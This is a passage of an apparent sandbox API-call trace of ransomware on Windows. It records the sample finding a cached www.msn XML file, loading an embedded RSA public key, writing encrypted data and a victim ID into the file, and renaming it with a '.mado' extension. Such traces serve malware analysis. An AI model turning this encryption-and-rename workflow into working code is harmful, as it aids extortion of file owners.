Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\") returned="UV0DUWVB\\" [0207.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0207.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0207.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0207.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.261] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.261] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.261] PathFindFileNameW (pszPath="") returned="" [0207.261] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.262] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.262] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.262] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0207.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d65b8 | out: hHeap=0x2c0000) returned 1 [0207.262] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.262] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\") returned="VGMTOI09\\" [0207.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0207.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0207.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0207.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.263] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.263] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.263] PathFindFileNameW (pszPath="") returned="" [0207.263] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.263] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.263] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 1 [0207.263] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned=".xml" [0207.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.264] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=836) returned 1 [0207.264] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.266] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x31e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.266] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.268] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x344, lpOverlapped=0x0) returned 1 [0207.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.268] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0207.269] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.269] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.269] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.269] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.269] GetLastError () returned 0x0 [0207.269] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.269] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0207.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.269] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.269] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.269] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.269] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b836a8, Size=0x218) returned 0x3b7c6a8 [0207.270] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x344, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.270] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0207.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0207.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0207.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0207.270] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0207.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0207.270] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.270] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.270] CloseHandle (hObject=0x63c) returned 1 [0207.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67078 [0207.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8f0) returned 0x3b7b950 [0207.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0207.272] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.mado")) returned 1 [0207.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.272] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0207.273] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 0 [0207.273] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d65b8 | out: hHeap=0x2c0000) returned 1 [0207.274] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0207.274] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) 